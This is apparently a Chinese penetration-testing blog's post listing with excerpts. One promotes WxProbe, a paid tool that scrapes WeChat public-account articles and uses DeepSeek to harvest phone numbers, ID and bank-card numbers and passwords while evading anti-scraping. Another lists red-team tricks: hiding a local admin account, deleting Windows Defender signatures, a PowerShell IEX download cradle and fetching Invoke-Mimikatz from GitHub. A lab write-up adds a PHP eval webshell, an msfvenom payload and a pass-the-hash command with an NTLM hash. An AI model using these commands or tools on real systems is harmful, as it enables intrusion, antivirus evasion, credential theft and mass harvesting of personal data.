首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,787 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,143 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,303 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
187
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
26
篇与
的结果
2026-05-13
WxProbe,一款自研的公众号敏感信息收集工具
此工具的灵感主要是源于一次北京红队金融项目,在公众号这块的信息收集实验比较少,要手动一个一个公众号去翻,特意写的一个工具这个工具主要用于敏感信息收集工具,专注于微信公众号文章批量获取与 AI 智能分析。通过 Token 登录微信公众平台,批量抓取指定公众号发布的历史文章,利用 DeepSeek AI 识别手机号、身份证、邮箱、车牌号、密码等等敏感信息。以及公司关联信息,公司注册资金、统一信用代码,法定代表人,股东结构等等信息(AI生成的结果,仅供参考)注:此工具仅限于学习使用,请勿用于非法用途,若造成不良后果,与工具开发者以及泷羽Sec安全团队无关,请自行承担相应的法律责任,此工具禁止逆向源码,一旦发现,后果自负,若需要源码二开,可以自行联系工具作者一次性买断(白菜价)。技术架构WxProbe ├── WeChatLogin # Token + Cookie 登录管理 ├── ArticleFetcher # 文章列表获取 + 正文抓取 │ ├── scrapling # headless 隐身模式(反爬) │ └── requests # 保底方案 ├── SensitiveInfoAnalyzer │ ├── _regex_scan # 正则快速扫描(手机号/身份证/邮箱/IP等) │ └── analyze_single # DeepSeek AI 深度分析 ├── WechatSogouAPI # 搜狗微信搜索(可选) └── ShadowEyeApp (UI) ├── 公众号情报 Tab ├── 搜狗搜索 Tab ├── URL 抓取 Tab └── 设置 / 导出 模块 功能 🔐 公众号情报 Token 一键登录 → 搜索公众号 → 多页爬取文章 → AI 分析 → 导出报告 🔎 搜狗搜索 无需登录,直接搜索微信文章 → 一键抓取 → AI 分析敏感信息 📎 URL 抓取 粘贴微信文章链接(单条/批量),抓取正文并用 AI 分析 🤖 AI 分析 DeepSeek + 正则双引擎:手机号、身份证、邮箱、IP、银行卡、密钥等 使用教程打开微信公众平台扫码登录登录后复制token复制cookie复制到这上面来输入之后就能登录成功尝试搜索公众号默认是五页选择自己要爬取的公众号后点击爬取刚开始是没有敏感信息的,需要手动点击是否进行AI分析,这里使用的AI是deepseek需要在系统设置,设置自己的apikey和模型名称AI分析完成后,可以在敏感信息中看到常见的手机号、身份证号、姓名、邮箱、地址、IP地址、银行卡号、网站链接/域名、密码/密钥/Token、组织机构代码、车牌号、QQ/微信号、其他PII等等,对于公司信息会调出企业工商信息,比如(注册资金,实缴资本、统一社会信用代码、注册时间等等工商信息,以及公司结构)这对于公众号这块的信息来讲是非常的有用的中国债卷尝试若您对结果不满意,可以导出功能,自行对数据进行分析2、信息收集部分,本工具已绕过搜狗反爬功能,您可以通过搜狗搜索引擎,搜索到微信公众号相关文章,利用AI进行敏感信息分析,和前面一样比如邮箱、手机号等等信息,为了稳定请不要频繁点击某一个功能,耐心等待工具执行(若数据量较大可能要等待10分钟、一小时),在此期间可以双击某一个文章查看文章详情注意:对于搜狗搜索引擎,单个文章建议请抓取一次即可,不要重复抓取,否则极易促发反爬。3、若您已经拥有了一定数量的公众号相关的URL,则可以使用URL抓取功能例如https://mp.weixin.qq.com/s/caVRY62bhNZm5Ri81oqUwghttps://mp.weixin.qq.com/s/hcB1m6tmDFfx9PA7rNzOZA注意:对于某号文章爬取,可全面绕过,稳定爬取,无需担心被拦截,但需要确保你已成功登录工具获取方式,扫描下方二维码加入freebuf知识大陆即可获取,仅需79此时加入,可获取香港免备案服务器一个月使用权(配置:4核心 4GB 硬盘:40G 带宽:10Mbps 峰值 流量:无流量限制),限时到2026年6月1日之前,之后不再赠送注:服务器使用需要实名,介意的话可以忽略赠品常见问题Q: 搜狗搜索提示验证码拦截? 先执行一次搜索(让系统建立 session),搜索成功后 session 会缓存,后续抓取会复用该 session。Q: URL 抓取按钮一直"分析中"? 需要先在「公众号情报」tab 完成登录。如果已登录仍卡住,可能是网络问题,2 分钟超时后会自动恢复。Q: 分析结果为空或"未获取到正文"? scrapling 可能被反爬。程序会自动降级到 requests + BeautifulSoup 保底方案。如仍失败,检查文章链接是否有效。
2026年05月13日
1,005 阅读
0 评论
1 点赞
2026-04-15
红队150+工具集RedTeam-Tools 使用教程
红队实战技巧向红队老手取经——这里收集了一堆红队实战技巧,覆盖了各种战术、工具和方法论,拿来就能提升你的红队水平。利用鼠标事件改进HTML走私'Qakbot在HTML走私附件里加了鼠标移动事件监听,沙箱里不挪鼠标压缩包就不弹出来。'利用谷歌翻译搞钓鱼钓鱼页面通过谷歌翻译的页面预览功能做代理转发,骗取受害者输入的凭据。隐藏本地管理员账户reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f'搞持久化创建账号容易被蓝队发现。但你可以用注册表里的小魔法把本地管理员账号藏起来。'删签名废掉Windows Defender"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'做法有点粗暴,但如果Windows Defender让你头疼得不行,别直接关(会弹告警),删掉签名文件就行。'开启多用户RDP会话reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f'有时候你想RDP登录一台机器,但那个用户已经有活动会话了。开启多用户会话就能解决。'Sysinternals PsExec的本地替代wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "'横向移动的时候还要上传Sysinternals PsExec.exe,烦不烦?Windows系统里自带了一个更好用的替代品。试试这个。'活在 Land 的端口扫描器0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null'能用系统自带就别往机器上扔工具(原因多了去了)。PowerShell和.NET都能帮上忙。比如这个用PowerShell写的简易端口扫描器。'感知代理的PowerShell下载$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")'现在大企业基本都架了Web代理,标准PowerShell下载摇篮不走代理,这个版本能感知代理。'从浏览器书签找内网端点type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"'光看用户的浏览器书签就能找到不少好东西,比如他们能访问的那些内部系统地址。'查DNS记录做信息收集Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>'信息收集占了95%的活。但疯狂扫环境动静太大,不如直接跟DC/DNS服务器要一份完整的DNS记录?'不用PowerUp查无引号服务路径Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name'不用PowerUp也能找到无引号服务路径'用/k绕过禁用的CMD# Win+R(调出运行框) cmd.exe /k "whoami"'管理员已禁用命令提示符...' 这种提示在Kiosk电脑之类的环境里挺常见。快速绕过的方法是通过Windows运行框加/k参数,命令照样执行,弹完限制提示也就完事了。'不让Defender删mimikatz.exe(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv'Windows Defender老删你mimikatz.exe,烦不烦?试试这个替代方案。'检测是否在虚拟机里reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"'想知道自己是不是在虚拟机里?查注册表就行了!!!只要搜出结果,就说明你在虚拟机里。'枚举AppLocker规则(Get-AppLockerPolicy -Local).RuleCollections Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\'AppLocker有时候挺烦人的,先枚举看看它到底有多烦。'用画图6像素搞出CMD快捷方式打开MSPAInt.exe,画布尺寸设为:宽=6像素,高=1像素放大画布,方便操作用取色器,从左到右依次设置每个像素的RGB值:1st: R: 10, G: 0, B: 02nd: R: 13, G: 10, B: 133rd: R: 100, G: 109, B: 994th: R: 120, G: 101, B: 465th: R: 0, G: 0, B: 1016th: R: 0, G: 0, B: 0保存为24位位图(.bmp;.dib)把扩展名从bmp改成bat,然后运行。'一种不太常见但很管用的拿shell方法——在微软画图里用特定颜色画几个像素,就能生成一个指向cmd.exe的快捷方式。BMP文件的编码算法有漏洞可钻,精心挑选RGB颜色值就能往文件里写入指定的ASCII数据。'PreventDefault JavaScript链接欺骗<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>PreventDefault Example</title> </head> <body> <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a> </body> </html>已经有威胁行为者用这招来骗受害者点击伪造的恶意下载链接。利用JavaScript的PreventDefault方法,鼠标悬停时显示的是google.com这种正常链接,但一点下去就被重定向到攻击者的恶意链接bing.com。用来诱导受害者从你控制的站点下载payload相当好用。'用Responder测SMB防火墙规则Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"'做失陷评估的时候,我经常问客户能不能最后做个快速检查:Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"。要是Responder能抓到哈希,说明防火墙放行了出站SMB连接。''用SysInternals PsSuspend干AV用微软Sysinternals工具PsSuspend.exe可以挂起某些杀软的服务进程。这个微软签名工具接收PID或服务名,然后通过NtSuspendProcess这个Windows API把进程挂起。'侦察spiderfootSpiderFoot是一款开源情报(OSINT)自动化工具,几乎对接了市面上所有能用的数据源,还内置了多种数据分析方法,查出来的信息一目了然。SpiderFoot既可以进攻用(比如红队演练或渗透测试时做目标侦察),也可以防守用——看看你或你的组织在互联网上到底暴露了哪些东西。安装:wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz tar zxvf v4.0.tar.gz cd spiderfoot-4.0 pip3 install -r requirements.txt完整安装说明见这里。使用方法:Python3 ./sf.py -l 127.0.0.1:5001大量用法教程视频见这里reconftwreconFTW把整个信息收集流程全自动化了。子域名枚举、各种漏洞检查、目标信息最大化获取——一条龙搞定,效率远超手工操作。安装:Git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh完整安装说明见这里。使用方法:# 单目标域名 ./reconftw.sh -d target.com -r # 一个目标,多个域名 ./reconftw.sh -m target -l domAIns.txt -r # 被动侦察 ./reconftw.sh -d target.com -p # 执行所有检查和漏洞利用 ./reconftw.sh -d target.com -a完整使用说明见这里。subzy子域名接管检测工具,基于can-i-take-over-xyz的响应指纹匹配来工作。安装:go install -v Github.com/PentestPad/subzy@latest完整安装说明见这里。使用方法:# 子域名列表 ./subzy run --targets list.txt # 单个或多个目标 ./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.comsmtp-user-enum通过VRFY、EXPN和RCPT命令枚举SMTP用户,内置了智能超时、重试和重连机制。安装:pip install smtp-user-enum使用方法:smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --versioncrt.sh -> httprobe -> EyeWitness我拼了一条bash命令,一条龙搞定:从证书透明度日志被动收集子域名列表(crt.sh)主动请求每个子域名验证存活(httprobe)给每个子域名截图供人工审查(EyeWitness)使用方法:domAIn=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; Python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web注意:需要安装httprobe、pup和EyeWitness,并把'DOMAIN_COM'改成目标域名。如果有多个目标根域名,可以在多个终端窗口并发跑。jsendpoints一个JavaScript书签工具,用于提取网页上所有的API端点链接。由@renniepak创建,这段JavaScript代码可以从当前网页DOM中提取所有端点(以/开头的路径),包括网页中嵌入的所有外部脚本资源。JavaScript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();用法(书签)创建一个书签……右键点击书签栏点击'添加页面'把上面的JavaScript粘贴到'网址'框里点击'保存'……然后浏览器访问目标页面,点击这个书签就行了。用法(控制台)把上面的JavaScript粘贴到控制台窗口(F12),回车执行。nuclei快速漏洞扫描器,使用.yaml模板来搜索特定类型的安全问题。安装:go install -v Github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest使用方法:cat domAIns.txt | nuclei -t /PATH/nuclei-templates/certSniffcertSniff是我用Python写的证书透明度日志关键词监控工具。它用certstream库来监控包含指定关键词的证书创建日志。设置好跟目标域名相关的关键词让它跑着,一旦有新证书创建就会被记录下来,说不定就能发现你之前不知道的子域名。安装:Git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt使用方法:Python3 certSniff.py -f example.txtgobuster对目标网站进行文件和目录路径爆破的好工具。安装:sudo apt install gobuster使用方法:gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20feroxbuster专为强制浏览(Forced Browsing)攻击设计的工具——目标是枚举和访问那些Web应用没有显式引用、但攻击者仍然能访问的资源。Feroxbuster用字典暴力搜索目标目录下未被链接的内容。这些资源里可能藏着Web应用和操作系统的敏感信息,比如源码、凭据、内网地址等等……安装(Kali):sudo apt update && sudo apt install -y feroxbuster安装:(Mac)curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash安装(Windows):Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .\feroxbuster.zip .\feroxbuster\feroxbuster.exe -V完整安装说明见这里。使用方法:# 为每个URL添加.pdf、.js、.html、.php、.txt、.json和.docx扩展名 ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx # 带请求头扫描 ./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}" # 从标准输入读取URL cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files # 通过BurpSuite代理请求 ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080完整用法示例见[这里](https://epi052.github.io/feroxbuster-docs/docs/examples/)。 CloudBrute用来在主流云平台上(亚马逊、谷歌、微软、DiGitalOcean、
2026年04月15日
1,295 阅读
0 评论
0 点赞
2025-12-08
【域渗透】cyberstrikelab-lab3
cyberstrikelab-lab3web信息收集端口扫描nmap -sT -Pn -p- 192.168.10.10 -T4 3590端口开启是一个web应用扫描出来了一个访问看看是一个登录框查看登录界面的网页源码登录进来看到版本信息使用万能的搜索引擎看到这里有一个本地文件泄露漏洞找到第一个flag另外还发现能在web目录写入文件,我们写入一句话<?php @eval($_POST['cmd']);?> 蚁剑连接msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 内网渗透上线msf直接就是系统权限查找fscanfind / -name "fscan.exe" 2>/dev/null 利用meterpreter模块上传upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 看到有双网卡fscan扫描另一张网卡,发现192.168.20.20和192.168.20.30靶机,其中30是域控主机使用fscan扫描第一台机器的端口添加路由run post/multi/manage/autoroute 配置代理use auxiliary/server/socks_proxy set VERSION 5 set SRVPORT 1080 run -j 修改代理vi /etc/proxychains4.conf 访问到thinkphp站从flag中可以看到木马在主页使用awBruter密码爆破工具,爆破出来密码是admin123蚁剑设置好代理使用密码连接找到第二个flag拿下系统权限域渗透之后就可以上传msf马,如果蚁剑不行的话(这个环境可能有一点问题,第二台机器老是断网)那就使用windows的远程连接上传到10.10,然后再利用windows自带的远程连接传20.20机器(前提是创建了一个远程连接用户),往期很多文章都写过,之后利用msf抓取hash或者使用猕猴桃抓取哈希,使用hash传递攻击proxychains impacket-psexec -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30
2025年12月08日
670 阅读
0 评论
0 点赞
2025-12-01
Muki 2.0:红队资产指纹识别利器,精准锁定攻击入口
Muki 是红队作战场景下的专属资产指纹识别利器,核心聚焦渗透测试的信息收集阶段 —— 面对 C 段资产、海量杂乱目标时,能帮助安全研究人员快速穿透信息迷雾,精准锁定具备攻击入口的易受攻击系统,为后续渗透测试提供明确靶标。其技术优势在于突破传统被动式扫描的局限,在被动指纹探测基础上,新增特殊路径定向扫描机制,可捕获常规被动扫描无法覆盖的隐藏资产特征;升级至 2.0 版本后,已整合 3W+ 精准指纹库,覆盖各类主流及小众系统、应用场景。目前工具提供 Linux、Mac、Windows 全平台版本,适配红队不同作战环境需求,是信息收集阶段高效、可靠的必备工具。开源地址https://github.com/yingfff123/MUKI快捷下载方式,Linuxwget https://github.com/yingfff123/MUKI/releases/download/2.02/MUKI-2.02-linux-amd64.zipunzip MUKI-2.02-Linux-amd64.zipcd MUKI-2.02-Linux-amd64./muki参数列表 --config 配置文件(默认为 $HOME/.Muki.yaml)-f, --文件字符串 包含待扫描 URL 的文件--格式字符串 输出格式(控制台、JSON、CSV)(默认值为“控制台”)-h, --帮助 Muki 的帮助信息-l, --列表字符串 包含多个待扫描 URL 的文件(每行一个)-A, --无活动模式 禁用活动指纹扫描-N, --无目录模式 禁用目录扫描-x, --无被动模式 禁用被动指纹扫描-o, --输出字符串 输出文件路径-p, --代理字符串 指定代理服务器,例如 http://127.0.0.1:8080 或 socks5://127.0.0.1:1080-t, --线程整数 线程数量(默认值:CPU 核心数 × 3,最小 8,最大 100)(默认值 8)-u, --URL 字符串 待扫描的 URL使用方法./muki -u https://www.baidu.com风险评估、敏感信息、敏感路径被动指纹、路径扫描等模块重点资产信息
2025年12月01日
762 阅读
0 评论
0 点赞
2025-11-06
文章推荐页
2025年11 月6日Nmap防火墙绕过技巧详解 955 162025年10 月30日【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用 2267 5628日HackMyVm-DC04:难 712 3028日HackMyVm-DC03 :中等 760 2527日HackMyVm-DC02 :中等 867 2427日HackMyVm-DC01 :简单 887 2027日Hackmyvm-TriplAdvisor :简单 792 1927日HackMyVm-Runas :简单 776 2527日HackMyVm-Always :简单 848 1827日HackMyVm-Nessus :简单 779 1827日HackMyVm-Liar :简单 621 2227日HackMyVm-Simple :简单 903 3027日HackMyVm-Zero :简单 771 3027日HackMyVm-quoted :简单 624 2527日HackMyVm-OMG :简单 899 3026日全网首发!HMV全套Windows机器提权,域渗透教程,2w字超详细 1908 2515日中秋放毒!永远9.9每月的高防云服务器!搭建自己的网安知识库! 799 2715日vuln靶机-GoldenEye1.1,OSCP必刷靶机 928 2215日vulnhub靶机-devt-improved,nano/vim提权 789 172025年9 月11日Photographer 1-vulnhub靶机渗透 1148 2611日Nightmare (v1.0.2)-vulnhub靶机渗透 716 911日Healthcare靶机渗透,vulnhub环境变量提权 1717 3011日Stapler-vulnhub靶机渗透 1263 2211日Devguru-vulnhub靶机渗透,OSCP之路 916 2011日Breach2.0-vulnhub靶机渗透,OSCP认证之路 688 222025年8 月14日vulnhub-Toppo靶机,python、awk的SUID提权,两种提权方式 844 2113日vulnhub-STAPLER: 1 内核&sudo提权 716 192025年7 月23日红队命令速查手册 915 2318日vulnhub–GlasgowSmile-v1.1 960 2116日12款优秀的终端工具推荐,来看看有没有你喜欢的! 902 1915日BurpSuite v2025.6.3汉化版,附激活教程 1913 3213日SRC平台推荐,挖SRC必须知道的25个漏洞提交平台 2610 1910日FeatherScan v4.0 – 适用于Linux的全自动内网信息收集工具 1798 406日sar靶机,suid计划任务提权 872 186日W34KN3SS,通过openssl漏洞公匙获取私匙 956 193日Windows提权方法一览 899 302025年6 月29日掩日-适用于红队的综合免杀工具 1080 2528日HW 中如何利用 WAF 缺陷进行绕过 1149 2224日Notepad++ v8.8.1 本地提权复现 1041 2322日2025最新渗透测试靶场推荐,新手必练的靶场推荐 3553 8720日靶机Misdirection: 1 ~ VulnHub 1132 2114日渗透测试命令汇总,常用的渗透测试命令大全 1023 2814日【内网渗透】隐藏通信隧道技术,牢饭直通车 1025 243日microsocks,一个轻量级的socks代理工具 1396 302025年5 月20日什么是OSCP国际渗透测试专家中级认证? 1000 1818日网易云js逆向代码分析 845 2918日java框架Shiro流量分析 869 2018日Linux进程隐藏 1039 2218日Kali Linux Shell编程:基础到进阶 851 2118日【Kali笔记】shodan的20种使用方法,信息收集必备 756 2818日一款在线的免杀平台AVEvasionCraftOnline 1157 2918日使用oh-my-posh美化Windows终端 735 1718日Metasploit Framework (MSF) 使用指南 1047 1718日DIRB:一款强大的Web目录扫描工具使用指南 1088 1618日【Kali笔记】figlet终端艺术字 1002 1718日Vuln靶机Prime_Series_Level-1 1326 3818日Vuln靶机NullByte 1469 3418日Vulnhub靶机Moria1.1 587 1218日Vulnhub靶机bob 1410 3118日Vulnhub-DERPNSTINK 1 1469 3618日vulnerable_Docker,3种代理方法打入内网,frp,MSF,reGeorg 1367 2918日Tr0ll系列提权教程,Tr0ll 靶机全系列(1-3) 295 1618日Tiki提权靶机渗透 991 3018日tar、zip命令提权—zico2 956 2718日PwnLab init-文件包含、反弹shell、提权–靶机渗透思路讲解 815 2418日FristiLeaks1.3-提权靶机渗透 364 918日雷池+frp内网穿透,搭建企业级内网防护,无需花高额费用买服务器,教科书级别教学 272 1818日HTB-EscapeTwo 785 718日超长攻击链vulhub靶机,TommyBoy1dot0 1219 2818日vulnhub提权靶机SickOS系列 1639 3818日vulnhub靶机hackme 1709 3918日Sudo的上级目录提权,SkyTower 1666 2918日pWnOS系列全教程,Webmin文件披露,Simple PHP Blog渗透教程 1361 2618日Kioptrix 提权靶机(1-5)全系列教程,Try Harder! 715 2618日JOY,ProFTPd的拷贝漏洞 1189 2918日IMF缓冲区提权渗透 1146 2618日Hack_Me_Please,js信息泄露,二级目录遍历 784 2418日FALL,wfuzz对参数的模糊测试 1109 2218日BSides-Vancouver-2018-Workshop,FTP匿名登录,wordpress渗透 778 1818日Blender软件的信息泄露—VulnOSv2 300 1518日提权靶机Node 438 918日红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路 358 1518日不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学 175 2018日靶机-election 978 2018日WEBDEVELOPER,tcpdump提权 918 2418日Vuln靶机SolidState 519 2018日稀有靶机-Readme 931 2218日红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学 833 2318日从0-1讲解RCE漏洞绕过,Windows与LinuxRCE漏洞绕过方式总结—-实战解析 678 2918日SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝 659 1718日文件上传10种WAF绕过姿势 1482 3918日upload-labs通关全教程(建议萌新收藏)Web安全-文件上传漏洞超详细解析 1342 3118日文件包含_PHP filter伪协议利用方式 1383 3018日从零开始学习文件包含 1324 3018日PHP反序列化漏洞从入门到深入8k图文介绍,以及phar伪协议的利用 1340 3818日XSS高级用法,SEO,挂ma,MS14_064利用 1166 2918日Web安全中的XSS攻击详细教学,XSS-Labs靶场通关全教程(建议收藏) 909 3018日phpStudy 小皮 Windows面板 存在RCE漏洞(nday) 826 2418日Kali下安装与使用BeEF-XSS 804 2418日【WAF剖析】10种XSS某狗WAF绕过姿势 930 2118日CTFHub技能树通关教程——SSRF漏洞原理攻击与防御 1024 2018日某cms的渗透测试过程 1180 2418日放开双手 ,SQL注入Fuzzing字典 (270个) 653 1118日从零开始学SQL注入(sql十大注入类型):技术解析与实战演练 408 1918日安全狗WAF绕过-SQL注入 262 1018日SQL注入之dnslog 373 1918日1w字带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透 386 1518日DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程 864 2218日DC-1综合靶场渗透从外网打到内网,权限提升,入侵痕迹清除,干货,建议收藏 784 2418日DC1-9(全)Linux提权靶机渗透教程 817 1818日AIWEB1综合靶场通关教程【附靶场环境】 860 2018日【渗透测试】DC-3提权靶场渗透教程 897 2418日棱镜X单兵渗透平台 1091 2918日SPF机制进行邮件钓鱼 875 2418日FTP匿名登录 934 2718日CS与MSF联动 900 2518日Linux隐身登录 1405 3718日【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF,CS 1641 2718日内网隐蔽扫描,Nmap高级用法 1789 3318日【内网渗透】免工具,内网和域内信息收集的40种方式总结 821 1818日渗透测试rbash逃逸 1099 1918日什么是域?如何搭建一个简单的域环境? 773 2418日find基础命令与提权教程 964 2618日【Kali笔记】MSF内网渗透,免杀过360 992 2118日Windows和Linux的命令混淆方式 311 818日Hadoop & Redis未授权访问漏洞,靶场实战——Vulfocus 343 818日伪静态注入总结 211 1218日Windows渗透操作系统 1336 3918日CTF-OS,一个专门为CTF设计的操作系统 1083 2718日几个常见的密码字典推荐 1967 3118日渗透测试中16款谷歌插件最全分享 1110 3718日车联网渗透系统 1079 2618日比Kali更稳定,工具更多,更加适合开发的操作系统blackarch 1285 2618日burp suite31款插件分享 1134 2818日2024年7月JetBrAIns全家桶激活到2099年工具分享,pycharm、IDE、phpStorm等专业版激活工具 815 3118日2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具 1006 3318日【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1 1060 4018日深入某CMS渗透测试:从弱口令到接管webshell 654 2718日CISP-PTE综合练习win2003 974 2318日CISP-PTE综合靶场解析,MSF综合利用MS14-058【附靶场环境】 782 2118日CISP-PTE考试靶场及通关攻略(附靶场源码) 1415 2318日GZCTF动态flag部署教程 1469 2818日GZCTF比赛平台搭建——单Docker部署 671 2318日信息收集:网络空间测绘FOFA,查询语法最全使用方法(图文解析) 816 1618日灯塔安装教程 1169 2018日九头蛇thc-hydra密码爆破,九头蛇简单使用 304 11
2025年11月06日
691 阅读
0 评论
0 点赞
1
2
...
6